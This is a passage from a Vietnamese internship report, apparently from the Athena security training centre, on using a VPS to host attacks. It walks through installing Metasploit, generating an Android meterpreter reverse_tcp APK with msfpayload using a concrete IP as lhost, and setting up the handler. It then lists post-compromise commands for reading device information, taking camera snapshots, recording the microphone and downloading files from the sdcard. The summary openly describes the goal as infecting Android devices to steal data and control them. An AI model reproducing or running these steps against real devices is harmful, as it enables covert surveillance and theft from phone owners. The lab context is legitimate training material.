Lợi thế khi dùng VPS?
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng,
có toàn quyền quản lý root và có thể khởi động lại hệ thống bất cứ lúc nào. Do
vậy, VPS hạn chế 100% khả năng bị tấn công hack local.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau,
chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ
làm ảnh hưởng đến các Website khác cùng server. Riêng server VPS, một tài
khoản VPS bị tấn công thì mọi tài khoản VPS khác trên server đều không bị ảnh
hưởng.
Hoạt động hoàn toàn như một server riêng nhưng tiết kiệm được rất nhiều
chi phí nếu so sánh với việc thuê một Server riêng.

Ngoài việc thiết lập Web Server, Mail Server cũng như các ứng dụng khác
trên VPS thì người dùng còn có thể cài đặt để thực hiện những nhu cầu riêng như:
truy cập Web bằng trình duyệt Web, download/upload bittorent với tốc độ cao...
Trong trường hợp VPS bị thiếu tài nguyên có thể dễ dàng nâng cấp thêm
tài nguyên mà không phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành với thời gian chỉ từ 5-10 phút.
2.2.2 Hướng dẫn cài đặt Metasploit để tạo mã độc trên VPS
Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và
khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối
tượng Perl, với những components được viết bằng C, assembler, và
Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows,
MacOS. Bạn có thể download chương trình tại www.metasploit.com
Metasploit bao gồm 2 phiên bản dành cho người dùng là community và pro.
Ở đây ta chọn bản community vì nó miễn phí và thích hợp với việc nghiên cứu.

Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những
phần mềm khác.
Chọn thư mục cài đặt và nhấn Next:
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790 và nhấn Next:

Để mặc định tên Server và số ngày sử dụng, tiếp tục nhấn Next để tiến hành
cài đặt:
Đợi trong lúc Metasploit hoàn tất việc cài đặt

Tiến trình hoàn tất, chọn Finish và chọn ô “Access Metasploit Web UI” để
truy cập vào giao diện web của Metasploit:
Sau khi chọn Finish trình duyệt web sẽ mở lên và đi tới giao diện

Nhấp vào liên kết: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản
để đăng kí Metasploit. Điền Username, Password sử dụng và một số thông tin bổ
xung, rồi chọn Create Account:
Trình duyệt chuyển đến trang nhập khóa để kích hoạt chương trình, khóa
này được gửi miễn phí đến mail khi tải phần mềm. Sau khi điền khóa nhấn
“Activate License”:

Giao diện chương trình Metasploit Console
2.2.3 Tiến hành xâm nhập thiết bị Android từ VPS
Về cơ bản tạo mã độc trên VPS tương tự như trên khi làm Localhost, chỉ
thay ip của máy tấn công Kali bằng ip của VPS.
Sau khi đăng nhập vào VPS bằng Remote Desktop Connection trong
Windows thì ta mở Metasploit lên như hình bên dưới:

Chúng ta vẫn sử dụng câu lệnh sau:
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=5555
R > /root/Desktop/files.apk
Thay địa chỉ lhost bằng ip của VPS ta dùng để đăng nhập.
Các bước sau đó vẫn như bên phần Localhost đã hướng dẫn bên trên, tất
nhiên ip lhost sẽ là ip của VPS.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 14.0.21.58 (ip trùng với địa chỉ ip của VPS)
set lport 5555 (port trùng với port lúc tạo mã xâm nhập trên VPS)

Tới đây ta đã tạo mã độc thành công và đợi cho thiết bị android nhiễm mã
độc này, ta sẽ tiến hành đánh cắp thông tin hay điều khiển.
Sử dụng lệnh Help trong Metesploit để xem các chức năng hỗ trợ

 Lệnh sysinfo để xem thông tin cấu hình của thiết bị android.
 Lệnh ps để xem các tác vụ đang chạy
 Xem danh sách tập tin, thư mục sử dụng lệnh ls
 Thao tác camera của thiết bị sử dụng các lệnh sau:
o Webcam_list: danh sách các camera thiết bị sở hữu
o Webcam_snap [id]: chụp hình với camera với id xem bằng lệnh
webcam_list.
 Để thực hiện ghi âm ta nhập lệnh record_mic và file ghi âm sẽ được
lưu về máy, ở đây file ghi âm được lưu tại
C:/metasploit/uLiiZrZW.wav.
 Để xem thông tin sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh
sách file, thư mục
 Để tải tập tin bất kì về máy sử dụng lệnh download [tên file]

CHƯƠNG 3: TỔNG KẾT
Các kiến thức được bổ sung:
 Hiểu thêm về các hệ điều hành (Android, Kali Linux, Backtrack)
 Biết thêm về cách sử dụng Metasploit để đánh cắp thông tin.
 Cách thức để tấn công một máy sử dụng hệ điều hành Windows thông
qua lớp System Hacking.
 Cách thức một malware thâm nhập và đánh cắp dữ liệu.
Các kĩ năng được rèn luyện:
 Giải quyết công việc theo từng giai đoạn.
 Cố gắng hoàn thành công việc trong thời gian cho phép.
 Tập trung vào vấn đề quan trọng.
 Mạnh dạn trao đổi, chia sẻ kiến thức.
 Rèn luyện thêm kĩ năng thuyết trình.
Kết quả đạt được:
 Thực hiện tấn công và đánh cắp dữ liệu từ một máy sử dụng hệ điều
hành Windows
 Tạo mã độc và tiêm nhiễm vào thiết bị android và tiến hành lấy thông tin
cũng như điều khiển thiết bị này.
Tài liệu tham khảo
 Bộ lab + CD hướng dẫn android của Athena
 Bộ lab + CD hướng dẫn System hacking của Athena

Báo cáo thực tập Athena

Recomendados

Recomendados

Mais conteúdo relacionado

Mais procurados

Mais procurados (18)

Semelhante a Báo cáo thực tập Athena

Semelhante a Báo cáo thực tập Athena (20)

Mais de Khánh Trung Lý

Mais de Khánh Trung Lý (7)

Último

Último (20)

Báo cáo thực tập Athena